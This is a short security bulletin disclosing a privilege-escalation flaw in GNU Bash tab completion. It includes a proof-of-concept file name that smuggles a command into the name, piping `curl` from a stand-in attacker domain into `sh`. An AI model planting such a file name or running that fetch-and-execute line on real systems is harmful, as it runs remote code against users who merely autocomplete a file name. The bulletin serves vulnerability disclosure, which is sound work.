SB2017020701 - Privilege escalation in GNU Bash

Security Bulletin ID SB2017020701

Severity

Low

Patch available

NO

Number of vulnerabilities 1

Exploitation vector Local access

Highest impact Code execution

Breakdown by Severity

Low
Medium
High
Critical

Description

This security bulletin contains information about 1 security vulnerability.

1) Improper filename handling (CVE-ID: N/A)

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to incorrect handling of filenames, containing certain characters in GNU Bash. A local user can create a filename with double quote character followed by OS commands and execute them with privileges of the current user. The vulnerability is triggered automatically, once the victim starts typing the name of desired file and presses the Tab key to autocomplete the name of the file.

PoC-code:

	 some-very-long-string-nobody-is-going-to-type"`curl attacker-domain.org| sh`

Successful exploitation of the vulnerability may allow a local user with ability to place files on the filesystem to execute arbitrary OS commands with privileges of the current user.

Remediation

Cybersecurity Help is not aware of any official remediation provided by the vendor.

References

https://github.com/jheyens/bash_completion_vuln/raw/master/2017-01-17.bash_completion_report.pdf